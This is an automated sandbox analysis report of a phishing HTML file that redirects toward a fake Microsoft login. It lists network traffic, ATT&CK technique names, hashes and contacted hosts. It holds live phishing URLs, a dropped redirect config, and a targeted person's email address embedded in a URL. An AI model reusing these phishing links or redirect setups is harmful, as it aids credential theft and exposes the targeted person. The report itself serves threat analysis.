Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.17:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.17:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.227.222:443 -> 192.168.2.17:49800 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49801 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49802 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.evad.winHTM@20/29@50/343
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\A_C_H_JAN14.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2012,i,1761999076979844411,4633428751578564589,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2012,i,1761999076979844411,4633428751578564589,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.netHTTP Parser: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.net
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
file:///C:/Users/user/Desktop/A_C_H_JAN14.htm0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.1.229
truefalse
    high
    topimo.trilidarn.ru
    172.67.141.195
    truetrue
      unknown
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        pending-revew.pages.dev
        172.66.44.151
        truetrue
          unknown
          code.jquery.com
          151.101.194.137
          truefalse
            high
            nxuujj8c2bdeatmaujlbr0ml0o8s217ndkeeukkfgrp7cltltztrbllks.deryposi.ru
            188.114.97.3
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                high
                s-part-0036.t-0009.t-msedge.net
                13.107.246.64
                truefalse
                  high
                  challenges.cloudflare.com
                  104.18.95.41
                  truefalse
                    high
                    s-part-0017.t-0009.t-msedge.net
                    13.107.246.45
                    truefalse
                      high
                      www.google.com
                      216.58.206.36
                      truefalse
                        high
                        natrium100gram.site
                        194.163.42.36
                        truefalse
                          high
                          www.office.com
                          unknown
                          unknownfalse
                            high
                            cdn.jsdelivr.net
                            unknown
                            unknownfalse
                              high
                              aadcdn.msftauth.net
                              unknown
                              unknownfalse
                                high
                                identity.nel.measure.office.net
                                unknown
                                unknownfalse
                                  high
                                  login.microsoftonline.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                      unknown
                                      https://pending-revew.pages.dev/#?service=Wm5kcGJHeHBZVzF6UUd4cFpuUnZibVV1Ym1WMCZtaW5kZWQmYQ==false
                                        unknown
                                        https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.nettrue
                                          unknown
                                          https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                            unknown
                                            file:///C:/Users/user/Desktop/A_C_H_JAN14.htmtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            13.107.6.156
                                            unknownUnited States
                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            13.107.246.64
                                            s-part-0036.t-0009.t-msedge.netUnited States
                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            142.250.74.202
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            142.250.185.78
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            194.163.42.36
                                            natrium100gram.siteGermany
                                            6659NEXINTO-DEfalse
                                            2.18.64.220
                                            unknownEuropean Union
                                            6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                            104.18.187.31
                                            unknownUnited States
                                            13335CLOUDFLARENETUSfalse
                                            13.107.246.45
                                            s-part-0017.t-0009.t-msedge.netUnited States
                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            104.18.94.41
                                            unknownUnited States
                                            13335CLOUDFLARENETUSfalse
                                            40.79.150.120
                                            unknownUnited States
                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            216.58.206.36
                                            www.google.comUnited States
                                            15169GOOGLEUSfalse
                                            40.126.32.76
                                            unknownUnited States
                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            172.66.47.105
                                            unknownUnited States
                                            13335CLOUDFLARENETUSfalse
                                            151.101.66.137
                                            unknownUnited States
                                            54113FASTLYUSfalse
                                            151.101.194.137
                                            code.jquery.comUnited States
                                            54113FASTLYUSfalse
                                            35.190.80.1
                                            a.nel.cloudflare.comUnited States
                                            15169GOOGLEUSfalse
                                            142.250.74.195
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            142.250.184.195
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            151.101.1.229
                                            jsdelivr.map.fastly.netUnited States
                                            54113FASTLYUSfalse
                                            1.1.1.1
                                            unknownAustralia
                                            13335CLOUDFLARENETUSfalse
                                            172.67.141.195
                                            topimo.trilidarn.ruUnited States
                                            13335CLOUDFLARENETUStrue
                                            20.190.159.71
                                            unknownUnited States
                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            104.18.95.41
                                            challenges.cloudflare.comUnited States
                                            13335CLOUDFLARENETUSfalse
                                            216.58.206.46
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            64.233.167.84
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            20.50.73.13
                                            unknownUnited States
                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            239.255.255.250
                                            unknownReserved
                                            unknownunknownfalse
                                            188.114.97.3
                                            nxuujj8c2bdeatmaujlbr0ml0o8s217ndkeeukkfgrp7cltltztrbllks.deryposi.ruEuropean Union
                                            13335CLOUDFLARENETUSfalse
                                            188.114.96.3
                                            unknownEuropean Union
                                            13335CLOUDFLARENETUSfalse
                                            172.66.44.151
                                            pending-revew.pages.devUnited States
                                            13335CLOUDFLARENETUStrue
                                            40.126.32.136
                                            unknownUnited States
                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            104.17.25.14
                                            cdnjs.cloudflare.comUnited States
                                            13335CLOUDFLARENETUSfalse
                                            IP
                                            192.168.2.17
                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1592194
                                            Start date and time:2025-01-15 22:19:55 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:20
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • EGA enabled
                                            Analysis Mode:stream
                                            Analysis stop reason:Timeout
                                            Sample name:A_C_H_JAN14.htm
                                            Detection:MAL
                                            Classification:mal60.phis.evad.winHTM@20/29@50/343
                                            Cookbook Comments:
                                            • Found application associated with file extension: .htm
                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                            • Excluded IPs from analysis (whitelisted): 142.250.184.195, 216.58.206.46, 64.233.167.84
                                            • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com, clients.l.google.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • VT rate limit hit for: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                            Category:dropped
                                            Size (bytes):61052
                                            Entropy (8bit):7.996159932827634
                                            Encrypted:true
                                            SSDEEP:
                                            MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                            SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                            SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                            SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):209
                                            Entropy (8bit):4.924438477368104
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:72F5925266AB63756C0BA54F77DB6A5A
                                            SHA1:73DAF7DC80EF2EDB9D17DA52D9D11BCDA722023E
                                            SHA-256:30D4A9532FB69D172EEC610A25B65435EF7FC506ACCD402D94CB9D9003B80812
                                            SHA-512:0EFF0ACF78D520AE186EA5D66A9F7E4C4B70F8C761C9263FD26EF12DF912BDAA01A76C340052AE6A9B5BB73B4EF37F170795EAD93F47AE6DDB4757903E83526B
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"id":428,"key":"minded","username":"Minded","url_target":"https:\/\/topimo.trilidarn.ru\/kyVPsDa\/#M","optional_url":null,"created_at":"2025-01-09T19:41:31.000000Z","updated_at":"2025-02-07T19:41:31.000000Z"}
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                            Category:dropped
                                            Size (bytes):1435
                                            Entropy (8bit):7.8613342322590265
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                            Category:dropped
                                            Size (bytes):116345
                                            Entropy (8bit):7.997378915283506
                                            Encrypted:true
                                            SSDEEP:
                                            MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                            SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                            SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                            SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with very long lines (65447)
                                            Category:downloaded
                                            Size (bytes):87533
                                            Entropy (8bit):5.262536918435756
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:2C872DBE60F4BA70FB85356113D8B35E
                                            SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
                                            SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
                                            SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://code.jquery.com/jquery-3.7.1.min.js
                                            Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with very long lines (65447)
                                            Category:dropped
                                            Size (bytes):89501
                                            Entropy (8bit):5.289893677458563
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
